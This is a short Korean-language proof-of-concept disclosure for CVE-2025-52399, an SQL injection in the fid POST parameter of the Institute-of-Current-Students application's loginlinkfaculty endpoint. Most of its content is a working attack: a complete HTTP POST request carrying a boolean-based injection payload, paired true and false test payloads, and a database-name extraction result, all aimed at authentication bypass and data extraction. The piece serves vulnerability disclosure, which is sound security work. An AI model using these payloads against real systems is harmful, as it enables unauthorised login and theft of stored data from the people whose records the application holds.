
CVE-2025-52399에 대한 개념 증명 익스플로잇으로, Institute-of-Current-Students 애플리케이션의 loginlinkfaculty 엔드포인트를 통한 SQL 인젝션을 시연하여 인증 우회 및 데이터 추출을 수행합니다.
Institute-of-Current-Students 애플리케이션의 loginlinkfaculty 엔드포인트는 fid POST 파라미터를 통해 SQL 인젝션에 취약합니다. 이 파라미터는 SQL 쿼리에서 사용되기 전에 적절하게 이스케이프 처리되지 않아, 원격 공격자가 임의의 SQL 명령을 실행할 수 있습니다.
/loginlinkfaculty (POST)fidicsnewPOST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
fid=-1'+OR+3*2*1=6+AND+000942=000942--&pass=example
✅ -1' OR 3*2*1=6 AND 000942=000942 -- → TRUE
❌ -1' OR 2*3=4 AND 000942=000942 -- → FALSE
SELECT database(); -- 'icsnew' 반환
Isroil Mustafoqulov